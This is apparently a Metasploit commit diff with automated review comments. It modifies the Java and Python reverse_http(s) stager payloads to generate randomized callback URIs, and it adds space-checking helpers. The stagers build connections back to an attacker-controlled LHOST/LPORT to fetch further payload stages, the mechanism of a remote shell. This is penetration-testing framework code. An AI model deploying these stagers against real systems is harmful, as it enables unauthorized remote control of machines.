Land #4951: Dynamic URI generation for Java/Python reverse_http(s)

bug/bundler_fix
OJ 2015-03-19 12:41:20 +10:00
commit 1a2f35d806
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
3 changed files with 58 additions and 6 deletions


@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
module Metasploit3
CachedSize = 5500
CachedSize = 5499
include Msf::Payload::Stager
include Msf::Payload::Java
@ -40,12 +40,22 @@ module Metasploit3
end
def config
# Default URL length is 30-256 bytes
uri_req_len = 30 + rand(256-30)
# Generate the short default URL if we don't know available space
if self.available_space.nil?
uri_req_len = 5
end
spawn = datastore["Spawn"] || 2
c = ""
c << "Spawn=#{spawn}\n"
c << "URL=http://#{datastore["LHOST"]}"
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
c << "/INITJM\n"
c << "/"
c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
c << "\n"
c
end
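Review bot: The short-URI fallback in `config` fires only when `available_space` is nil, so when the space is known but too small for the up-to-255-byte URI the stager can still exceed it; the Python stager in this same commit additionally checks `required_space > self.available_space`, and the reverse_https Java stager below has the same gap. If a size estimate comparable to the Python stager's `required_space` exists for these modules, the guard should read `if self.available_space.nil? || required_space > self.available_space`. The comment `# Default URL length is 30-256 bytes` is also off by one: `30 + rand(256-30)` yields 30..255, and `rand(30..255)` would state the range directly. The rest of the module body lies outside the hunk.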


@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https'
module Metasploit3
CachedSize = 6308
CachedSize = 6307
include Msf::Payload::Stager
include Msf::Payload::Java
@ -42,12 +42,22 @@ module Metasploit3
end
def config
# Default URL length is 30-256 bytes
uri_req_len = 30 + rand(256-30)
# Generate the short default URL if we don't know available space
if self.available_space.nil?
uri_req_len = 5
end
spawn = datastore["Spawn"] || 2
c = ""
c << "Spawn=#{spawn}\n"
c << "URL=https://#{datastore["LHOST"]}"
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
c << "/INITJM\n"
c << "/"
c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
c << "\n"
c
end


@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
module Metasploit3
CachedSize = 442
CachedSize = 446
include Msf::Payload::Stager
@ -50,7 +50,7 @@ module Metasploit3
target_url << ':'
target_url << datastore['LPORT'].to_s
target_url << '/'
target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
target_url << generate_callback_uri
proxy_host = datastore['PayloadProxyHost'].to_s
proxy_port = datastore['PayloadProxyPort'].to_i
@ -77,4 +77,36 @@ module Metasploit3
b64_stub << "')))"
return b64_stub
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length
space += 256
# The final estimated size
space
end
#
# Return the longest URL that fits into our available space
#
def generate_callback_uri
uri_req_len = 30 + rand(256-30)
# Generate the short default URL if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
uri_req_len = 5
end
generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
end
end
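Review bot: The length bounds 30, 256 and 5 in `generate_callback_uri` are bare literals repeated verbatim in the two Java stagers in this commit, and `required_space` reserves 256 bytes while `30 + rand(256-30)` can yield at most 255; lifting them into named, frozen constants shared by the three stagers would keep the copies and the reservation in step. The header of `required_space` promises the "maximum amount of space", but the 100-byte encoder margin is unexplained; a comment such as `# 100 bytes of headroom for encoder overhead; revisit if encoders grow` would record the intent. The closing `end` belongs to the module, whose body starts outside the hunk.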